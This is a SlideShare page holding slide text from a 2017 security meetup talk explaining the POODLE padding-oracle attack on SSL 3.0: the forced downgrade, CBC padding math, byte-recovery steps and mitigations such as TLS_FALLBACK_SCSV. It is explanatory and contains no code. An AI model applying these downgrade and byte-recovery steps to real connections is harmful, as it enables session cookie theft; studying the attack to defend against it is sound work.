SlideShare a Scribd company logo

Poodle

Download as PPTX, PDF
S
Samit Anwer

Null Meet Talk 18/3/2017

Engineering
1 of 11
POODLE This POODLE Bites: Exploiting The SSL 3.0 Fallback Bodo Möller, Thai Duong, Krzysztof Kotowicz Presented By: Samit Anwer
Padding Oracle On Downgraded Legacy Encryption • If attacker interferes with a handshake offering TLS 1.0 or later, clients will downgrade to SSL 3.0 • Encryption in SSL 3.0 uses either the RC4 stream cipher or a block cipher (AES/DES) in CBC mode • We will be taking a running example of AES in CBC mode of operation • Assumption: • the attacker can modify network transmissions between client and server
• Attacker sends link to victim (http://evil.com) • When victim visits the link, the Javascript embedded on evil.com starts making cookie bearing requests to https://example.com A HTTP request looks like: POST /path Cookie: name=value...rnrn body • The attacker can MITM the encrypted traffic and attacker controls data in “path” and “body”. Attack Scenario
POST /path Cookie: name=value...rnrnbody ‖ 20byte MAC ‖ padding C1 C2 Ci Cn-1 Cn P1 P2 Pi Pn-1 Pn Pi Pn P1 CiC1 Cn Ci = EK(Pi Ꚛ Ci-1) C0 = IV Cipher Block Chaining Encryption EnCt29642a9666ee9dbc8c0306acacb63bf8dcf2c554d9642a9666ee9dbc8c0306acae2n1AGm0vgFHgpMKrFgwdWAEF AES block size is 16 bytes DES block size is 8 bytes
Cipher Block Chaining Decryption Pi = DK(Ci) Ꚛ Ci-1 C0 = IV C1 CnCi P1 Pi Pn C1 C2 Ci Cn-1 Cn P1 P2 Pi Pn-1 Pn POST /path Cookie: name=value...rnrnbody ‖ 20byte MAC ‖ padding EnCt29642a9666ee9dbc8c0306acacb63bf8dcf2c554d9642a9666ee9dbc8c0306acae2n1AGm0vgFHgpMKrFgwdWAEF Back
POST /path Cookie: sessionid=value...rnrnbody ‖ 20byte MAC ‖ padding Padding of 1 to L bytes (where L is the block size in bytes) is added before performing blockwise CBC The attacker controls the request path & request body & hence can forge requests such that: 1. The padding fills an entire block (encrypted into Cn). 2. The cookie’s first (as of yet unknown) byte appears as the final byte in an earlier block (which gets encrypted into Ci). • The attacker replaces Cn by any earlier ciphertext block Ci • the ciphertext will be accepted if DK(Ci) ⊕ Cn-1 happens to have 15 as its final byte, • otherwise, it will be rejected  giving rise to a padding oracle attack The attack Ci Cn
Attack Contd. Assuming L=16 (AES) and ciphertext gets accepted: From (a): 15 = DK(Ci) [15] ⊕ Cn-1[15] , which can be written as => DK(Ci) [15] = 15 ⊕ Cn-1[15] --------- (1) We know: Pi = DK(Ci) ⊕ Ci-1 and hence Pi[15] = DK(Ci) [15] ⊕ Ci-1[15] --------- (2) By replacing DK(Ci) [15] from (1) in (2) we get Pi[15] = 15 ⊕ Cn-1[15] ⊕ Ci-1[15] Unknown entity Known entity C1 Cn /CiCn-1 P1 Pn-1 Pn From CBC decryption (here) we know: Pi = DK(Ci) Ꚛ Ci-1  Pn = DK(Cn) Ꚛ Cn-1  Pn[15] = DK(Cn)[15] Ꚛ Cn-1[15] ----- (a) C1 C2 Ci Cn-1 Cn/Ci DK(Cn /Ci)
Overall Effort • 256 SSL 3.0 requests per byte Recommendation • disabling the SSL 3.0 protocol in the client or in the server or both • TLS_FALLBACK_SCSV • when an incoming connection includes 0x56, 0x00 (TLS_FALLBACK_SCSV) in ClientHello.cipher_suites, compare ClientHello.client_version to the highest protocol version supported by the server. If the server supports a version higher than the one indicated by the client, reject the connection Problem with SSL 3.0 in CBC mode: The integrity of padding cannot be verified when decrypting as it is not covered by the MAC
Demo Overview src: https://patzke.org/implementing-the-poodle-attack.html
Attack Steps: • Degrade TLS protocol usage to SSLv3 by disruption of TLS handshake attempts. • Justify the URL and POST length such that the last block of the ciphertext is padding. • Perform the copy operation on every generated TLS packet and calculate the leaked byte if the server accepts the modified packet.
References • This POODLE Bites: Exploiting The SSL 3.0 Fallback Bodo Möller, Thai Duong, Krzysztof Kotowicz https://www.openssl.org/~bodo/ssl-poodle.pdf • Attack of the week: POODLE, https://blog.cryptographyengineering.com/2014/10/15/attack-of- week-poodle/ • Implementing the POODLE Attack, https://patzke.org/implementing-the-poodle-attack.html

Recommended

Bartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
Bartosz Zaczyński (Grand Parade Poland) - WebSocket for DummiesBartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
Bartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
Business Link Krakow
 
Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...
Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...
Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...
HackIT Ukraine
 
0xdec0de01 crypto CTF solutions
0xdec0de01 crypto CTF solutions0xdec0de01 crypto CTF solutions
0xdec0de01 crypto CTF solutions
Vlad Garbuz
 
Fast HTTP string processing algorithms
Fast HTTP string processing algorithmsFast HTTP string processing algorithms
Fast HTTP string processing algorithms
Alexander Krizhanovsky
 
Packet flow on openstack
Packet flow on openstackPacket flow on openstack
Packet flow on openstack
Achhar Kalia
 
Creating qmgr and allowing remote authorization
Creating qmgr and allowing remote authorizationCreating qmgr and allowing remote authorization
Creating qmgr and allowing remote authorization
Ravi Babu
 
Secure LXC Networking
Secure LXC NetworkingSecure LXC Networking
Secure LXC Networking
Marian Marinov
 
XoxzoテレフォニーAPI入門2017
XoxzoテレフォニーAPI入門2017XoxzoテレフォニーAPI入門2017
XoxzoテレフォニーAPI入門2017
Xoxzo Inc.
 

Recommended

Bartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
Bartosz Zaczyński (Grand Parade Poland) - WebSocket for DummiesBartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
Bartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
Business Link Krakow
 
Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...
Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...
Hacking cryptography: 0xdec0de01 cryptoCTF solutions and a bit more - Владими...
HackIT Ukraine
 
0xdec0de01 crypto CTF solutions
0xdec0de01 crypto CTF solutions0xdec0de01 crypto CTF solutions
0xdec0de01 crypto CTF solutions
Vlad Garbuz
 
Fast HTTP string processing algorithms
Fast HTTP string processing algorithmsFast HTTP string processing algorithms
Fast HTTP string processing algorithms
Alexander Krizhanovsky
 
Packet flow on openstack
Packet flow on openstackPacket flow on openstack
Packet flow on openstack
Achhar Kalia
 
Creating qmgr and allowing remote authorization
Creating qmgr and allowing remote authorizationCreating qmgr and allowing remote authorization
Creating qmgr and allowing remote authorization
Ravi Babu
 
Secure LXC Networking
Secure LXC NetworkingSecure LXC Networking
Secure LXC Networking
Marian Marinov
 
XoxzoテレフォニーAPI入門2017
XoxzoテレフォニーAPI入門2017XoxzoテレフォニーAPI入門2017
XoxzoテレフォニーAPI入門2017
Xoxzo Inc.
 
Glomosim
GlomosimGlomosim
Glomosim
barodia_1437
 
初心者のためのPythonによるWebAPI活用方入門
初心者のためのPythonによるWebAPI活用方入門初心者のためのPythonによるWebAPI活用方入門
初心者のためのPythonによるWebAPI活用方入門
Xoxzo Inc.
 
Zeromq anatomy & jeromq
Zeromq anatomy & jeromqZeromq anatomy & jeromq
Zeromq anatomy & jeromq
Dongmin Yu
 
Casper FFG Explained
Casper FFG ExplainedCasper FFG Explained
Casper FFG Explained
상문 오
 
Geographically dispersed perconaxtra db cluster deployment
Geographically dispersed perconaxtra db cluster deploymentGeographically dispersed perconaxtra db cluster deployment
Geographically dispersed perconaxtra db cluster deployment
Marco Tusa
 
Glomosim introduction
Glomosim introductionGlomosim introduction
Glomosim introduction
Kathirvel Ayyaswamy
 
Nachos3 - Theoretical Part
Nachos3 - Theoretical PartNachos3 - Theoretical Part
Nachos3 - Theoretical Part
Eduardo Triana
 
2016-tcpkali-websocket
2016-tcpkali-websocket2016-tcpkali-websocket
2016-tcpkali-websocket
Lev Walkin
 
Non-DIY* Logging
Non-DIY* LoggingNon-DIY* Logging
Non-DIY* Logging
ESUG
 
Blocks, procs && lambdas
Blocks, procs && lambdasBlocks, procs && lambdas
Blocks, procs && lambdas
Vidmantas Kabošis
 
Netcat - A Swiss Army Tool
Netcat - A Swiss Army ToolNetcat - A Swiss Army Tool
Netcat - A Swiss Army Tool
Chandrapal Badshah
 
Tcpsockets
TcpsocketsTcpsockets
Tcpsockets
mcjayaprasanna8
 
OSMC 2018 | Handling messages and notifications from software and gadgets wit...
OSMC 2018 | Handling messages and notifications from software and gadgets wit...OSMC 2018 | Handling messages and notifications from software and gadgets wit...
OSMC 2018 | Handling messages and notifications from software and gadgets wit...
NETWAYS
 
Trip itparsing
Trip itparsingTrip itparsing
Trip itparsing
CapIpad
 
Tcpdump
TcpdumpTcpdump
Tcpdump
Mohamed Gamel
 
SSL And TLS
SSL And TLS SSL And TLS
SSL And TLS
Ghanshyam Patel
 
Nmap flags table
Nmap flags tableNmap flags table
Nmap flags table
hughpearse
 
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavur
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavurS.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavur
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavur
praveenaS25
 
Benchmarking for HTTP/2
Benchmarking for HTTP/2Benchmarking for HTTP/2
Benchmarking for HTTP/2
Kit Chan
 
Netcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaNetcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beema
Raghunath G
 
Null Bangalore Meet 18/03/17
Null Bangalore Meet 18/03/17Null Bangalore Meet 18/03/17
Null Bangalore Meet 18/03/17
Subash SN
 
Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638
Riyaz Walikar
 

More Related Content

What's hot

Geographically dispersed perconaxtra db cluster deployment
Geographically dispersed perconaxtra db cluster deploymentGeographically dispersed perconaxtra db cluster deployment
Geographically dispersed perconaxtra db cluster deployment
Marco Tusa
 
Nachos3 - Theoretical Part
Nachos3 - Theoretical PartNachos3 - Theoretical Part
Nachos3 - Theoretical Part
Eduardo Triana
 
2016-tcpkali-websocket
2016-tcpkali-websocket2016-tcpkali-websocket
2016-tcpkali-websocket
Lev Walkin
 
Trip itparsing
Trip itparsingTrip itparsing
Trip itparsing
CapIpad
 
Nmap flags table
Nmap flags tableNmap flags table
Nmap flags table
hughpearse
 
Netcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaNetcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beema
Raghunath G
 

What's hot (20)

Glomosim
GlomosimGlomosim
Glomosim
 
初心者のためのPythonによるWebAPI活用方入門
初心者のためのPythonによるWebAPI活用方入門初心者のためのPythonによるWebAPI活用方入門
初心者のためのPythonによるWebAPI活用方入門
 
Zeromq anatomy & jeromq
Zeromq anatomy & jeromqZeromq anatomy & jeromq
Zeromq anatomy & jeromq
 
Casper FFG Explained
Casper FFG ExplainedCasper FFG Explained
Casper FFG Explained
 
Geographically dispersed perconaxtra db cluster deployment
Geographically dispersed perconaxtra db cluster deploymentGeographically dispersed perconaxtra db cluster deployment
Geographically dispersed perconaxtra db cluster deployment
 
Glomosim introduction
Glomosim introductionGlomosim introduction
Glomosim introduction
 
Nachos3 - Theoretical Part
Nachos3 - Theoretical PartNachos3 - Theoretical Part
Nachos3 - Theoretical Part
 
2016-tcpkali-websocket
2016-tcpkali-websocket2016-tcpkali-websocket
2016-tcpkali-websocket
 
Non-DIY* Logging
Non-DIY* LoggingNon-DIY* Logging
Non-DIY* Logging
 
Blocks, procs && lambdas
Blocks, procs && lambdasBlocks, procs && lambdas
Blocks, procs && lambdas
 
Netcat - A Swiss Army Tool
Netcat - A Swiss Army ToolNetcat - A Swiss Army Tool
Netcat - A Swiss Army Tool
 
Tcpsockets
TcpsocketsTcpsockets
Tcpsockets
 
OSMC 2018 | Handling messages and notifications from software and gadgets wit...
OSMC 2018 | Handling messages and notifications from software and gadgets wit...OSMC 2018 | Handling messages and notifications from software and gadgets wit...
OSMC 2018 | Handling messages and notifications from software and gadgets wit...
 
Trip itparsing
Trip itparsingTrip itparsing
Trip itparsing
 
Tcpdump
TcpdumpTcpdump
Tcpdump
 
SSL And TLS
SSL And TLS SSL And TLS
SSL And TLS
 
Nmap flags table
Nmap flags tableNmap flags table
Nmap flags table
 
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavur
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavurS.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavur
S.Praveena,II-M.sc(Computer science),Bon Secours college for women,thanjavur
 
Benchmarking for HTTP/2
Benchmarking for HTTP/2Benchmarking for HTTP/2
Benchmarking for HTTP/2
 
Netcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaNetcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beema
 

Viewers also liked

2c esp8266 non-os_sdk_api_reference_en
2c esp8266 non-os_sdk_api_reference_en2c esp8266 non-os_sdk_api_reference_en
2c esp8266 non-os_sdk_api_reference_en
le van hoa
 

Viewers also liked (19)

Null Bangalore Meet 18/03/17
Null Bangalore Meet 18/03/17Null Bangalore Meet 18/03/17
Null Bangalore Meet 18/03/17
 
Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638
 
DataSploit - Tool Demo at Null Bangalore - March Meet.
DataSploit - Tool Demo at Null Bangalore - March Meet. DataSploit - Tool Demo at Null Bangalore - March Meet.
DataSploit - Tool Demo at Null Bangalore - March Meet.
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your Niche
 
Role of Technology in Recruitment
Role of Technology in Recruitment Role of Technology in Recruitment
Role of Technology in Recruitment
 
Aprendizaje
AprendizajeAprendizaje
Aprendizaje
 
Presentacion inclusion
Presentacion inclusionPresentacion inclusion
Presentacion inclusion
 
The theater of taormina
The theater of taorminaThe theater of taormina
The theater of taormina
 
Build Dynamic DNS server from scratch in C (Part1)
Build Dynamic DNS server from scratch in C (Part1)Build Dynamic DNS server from scratch in C (Part1)
Build Dynamic DNS server from scratch in C (Part1)
 
Gävle kopia
Gävle kopiaGävle kopia
Gävle kopia
 
Owasp top 10
Owasp top 10 Owasp top 10
Owasp top 10
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 
La entrada de la cueva original
La entrada de la cueva originalLa entrada de la cueva original
La entrada de la cueva original
 
Null picture forensics using ghiro appliance
Null picture forensics using ghiro applianceNull picture forensics using ghiro appliance
Null picture forensics using ghiro appliance
 
Exploiting a vulnerability to gain a shell
Exploiting a vulnerability to gain a shellExploiting a vulnerability to gain a shell
Exploiting a vulnerability to gain a shell
 
Hostile Subdomain Takeover by Ankit Prateek
Hostile Subdomain Takeover by Ankit PrateekHostile Subdomain Takeover by Ankit Prateek
Hostile Subdomain Takeover by Ankit Prateek
 
2c esp8266 non-os_sdk_api_reference_en
2c esp8266 non-os_sdk_api_reference_en2c esp8266 non-os_sdk_api_reference_en
2c esp8266 non-os_sdk_api_reference_en
 
Santa Barbara Polo & Racquet Club
Santa Barbara Polo & Racquet ClubSanta Barbara Polo & Racquet Club
Santa Barbara Polo & Racquet Club
 
Estabilidad Laboral
Estabilidad Laboral Estabilidad Laboral
Estabilidad Laboral
 

Similar to Poodle

Tcp congestion control
Tcp congestion controlTcp congestion control
Tcp congestion control
Abdo sayed
 
Tcp congestion control (1)
Tcp congestion control (1)Tcp congestion control (1)
Tcp congestion control (1)
Abdo sayed
 
4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf
4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf
4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf
ssuserf7cd2b
 
4.1.1.10 packet tracer configuring extended ac ls scenario 1
4.1.1.10 packet tracer configuring extended ac ls scenario 14.1.1.10 packet tracer configuring extended ac ls scenario 1
4.1.1.10 packet tracer configuring extended ac ls scenario 1
mps125
 
How (un)secure is SSL/TLS?
How (un)secure is SSL/TLS?How (un)secure is SSL/TLS?
How (un)secure is SSL/TLS?
Microsoft
 

Similar to Poodle (20)

TLS/SSL MAC security flaw
TLS/SSL MAC security flawTLS/SSL MAC security flaw
TLS/SSL MAC security flaw
 
NE #1.pptx
NE #1.pptxNE #1.pptx
NE #1.pptx
 
Technical Overview of QUIC
Technical Overview of QUICTechnical Overview of QUIC
Technical Overview of QUIC
 
13_TCP_Attack.pptx
13_TCP_Attack.pptx13_TCP_Attack.pptx
13_TCP_Attack.pptx
 
TCP_Congestion_Control.ppt
TCP_Congestion_Control.pptTCP_Congestion_Control.ppt
TCP_Congestion_Control.ppt
 
Tcp congestion avoidance
Tcp congestion avoidanceTcp congestion avoidance
Tcp congestion avoidance
 
Tcp congestion control
Tcp congestion controlTcp congestion control
Tcp congestion control
 
Tcp congestion control (1)
Tcp congestion control (1)Tcp congestion control (1)
Tcp congestion control (1)
 
What every Java developer should know about network?
What every Java developer should know about network?What every Java developer should know about network?
What every Java developer should know about network?
 
Lecture 5
Lecture 5Lecture 5
Lecture 5
 
4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf
4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf
4.1.1.10 Packet Tracer - Configuring Extended ACLs Scenario 1.pdf
 
4.1.1.10 packet tracer configuring extended ac ls scenario 1
4.1.1.10 packet tracer configuring extended ac ls scenario 14.1.1.10 packet tracer configuring extended ac ls scenario 1
4.1.1.10 packet tracer configuring extended ac ls scenario 1
 
Troubleshooting TCP/IP
Troubleshooting TCP/IPTroubleshooting TCP/IP
Troubleshooting TCP/IP
 
KandR_TCP (1).ppt notes for congestion control
KandR_TCP (1).ppt notes for congestion controlKandR_TCP (1).ppt notes for congestion control
KandR_TCP (1).ppt notes for congestion control
 
Data Link Layer
Data Link LayerData Link Layer
Data Link Layer
 
Part5-tcp-improvements.pptx
Part5-tcp-improvements.pptxPart5-tcp-improvements.pptx
Part5-tcp-improvements.pptx
 
Transport Layer in Computer Networks (TCP / UDP / SCTP)
Transport Layer in Computer Networks (TCP / UDP / SCTP)Transport Layer in Computer Networks (TCP / UDP / SCTP)
Transport Layer in Computer Networks (TCP / UDP / SCTP)
 
How (un)secure is SSL/TLS?
How (un)secure is SSL/TLS?How (un)secure is SSL/TLS?
How (un)secure is SSL/TLS?
 
packet traveling (pre cloud)
packet traveling (pre cloud)packet traveling (pre cloud)
packet traveling (pre cloud)
 
blockchain-and-trusted-computing
blockchain-and-trusted-computingblockchain-and-trusted-computing
blockchain-and-trusted-computing
 

Recently uploaded

(INDIRA) Call Girl Meerut Call Now 8617697112 Meerut Escorts 24x7
(INDIRA) Call Girl Meerut Call Now 8617697112 Meerut Escorts 24x7(INDIRA) Call Girl Meerut Call Now 8617697112 Meerut Escorts 24x7
(INDIRA) Call Girl Meerut Call Now 8617697112 Meerut Escorts 24x7
Call Girls in Nagpur High Profile Call Girls
 
Call Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance BookingCall Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance Booking
roncy bisnoi
 
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Dr.Costas Sachpazis
 
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
Call Girls in Nagpur High Profile Call Girls
 
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and workingUNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
rknatarajan
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Call Girls in Nagpur High Profile
 
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Call Girls in Nagpur High Profile
 
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
dollysharma2066
 
Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar ≼🔝 Delhi door step de...
Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar ≼🔝 Delhi door step de...Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar ≼🔝 Delhi door step de...
Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar ≼🔝 Delhi door step de...
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7
(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7
(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7
Call Girls in Nagpur High Profile Call Girls
 
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete RecordCCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
Asst.prof M.Gokilavani
 

Recently uploaded (20)

Intze Overhead Water Tank Design by Working Stress - IS Method.pdf
Intze Overhead Water Tank Design by Working Stress - IS Method.pdfIntze Overhead Water Tank Design by Working Stress - IS Method.pdf
Intze Overhead Water Tank Design by Working Stress - IS Method.pdf
 
Vivazz, Mieres Social Housing Design Spain
Vivazz, Mieres Social Housing Design SpainVivazz, Mieres Social Housing Design Spain
Vivazz, Mieres Social Housing Design Spain
 
(INDIRA) Call Girl Meerut Call Now 8617697112 Meerut Escorts 24x7
(INDIRA) Call Girl Meerut Call Now 8617697112 Meerut Escorts 24x7(INDIRA) Call Girl Meerut Call Now 8617697112 Meerut Escorts 24x7
(INDIRA) Call Girl Meerut Call Now 8617697112 Meerut Escorts 24x7
 
Call Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance BookingCall Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance Booking
 
NFPA 5000 2024 standard .
NFPA 5000 2024 standard .NFPA 5000 2024 standard .
NFPA 5000 2024 standard .
 
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
 
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
 
PVC VS. FIBERGLASS (FRP) GRAVITY SEWER - UNI BELL
PVC VS. FIBERGLASS (FRP) GRAVITY SEWER - UNI BELLPVC VS. FIBERGLASS (FRP) GRAVITY SEWER - UNI BELL
PVC VS. FIBERGLASS (FRP) GRAVITY SEWER - UNI BELL
 
chapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringchapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineering
 
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdfONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
 
UNIT-III FMM. DIMENSIONAL ANALYSIS
UNIT-III FMM. DIMENSIONAL ANALYSISUNIT-III FMM. DIMENSIONAL ANALYSIS
UNIT-III FMM. DIMENSIONAL ANALYSIS
 
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and workingUNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
 
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
 
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
 
BSides Seattle 2024 - Stopping Ethan Hunt From Taking Your Data.pptx
BSides Seattle 2024 - Stopping Ethan Hunt From Taking Your Data.pptxBSides Seattle 2024 - Stopping Ethan Hunt From Taking Your Data.pptx
BSides Seattle 2024 - Stopping Ethan Hunt From Taking Your Data.pptx
 
Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar ≼🔝 Delhi door step de...
Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar ≼🔝 Delhi door step de...Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar ≼🔝 Delhi door step de...
Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar ≼🔝 Delhi door step de...
 
(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7
(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7
(INDIRA) Call Girl Bhosari Call Now 8617697112 Bhosari Escorts 24x7
 
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete RecordCCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
 

Poodle

  • 1. POODLE This POODLE Bites: Exploiting The SSL 3.0 Fallback Bodo Möller, Thai Duong, Krzysztof Kotowicz Presented By: Samit Anwer
  • 2. Padding Oracle On Downgraded Legacy Encryption • If attacker interferes with a handshake offering TLS 1.0 or later, clients will downgrade to SSL 3.0 • Encryption in SSL 3.0 uses either the RC4 stream cipher or a block cipher (AES/DES) in CBC mode • We will be taking a running example of AES in CBC mode of operation • Assumption: • the attacker can modify network transmissions between client and server
  • 3. • Attacker sends link to victim (http://evil.com) • When victim visits the link, the Javascript embedded on evil.com starts making cookie bearing requests to https://example.com A HTTP request looks like: POST /path Cookie: name=value...rnrn body • The attacker can MITM the encrypted traffic and attacker controls data in “path” and “body”. Attack Scenario
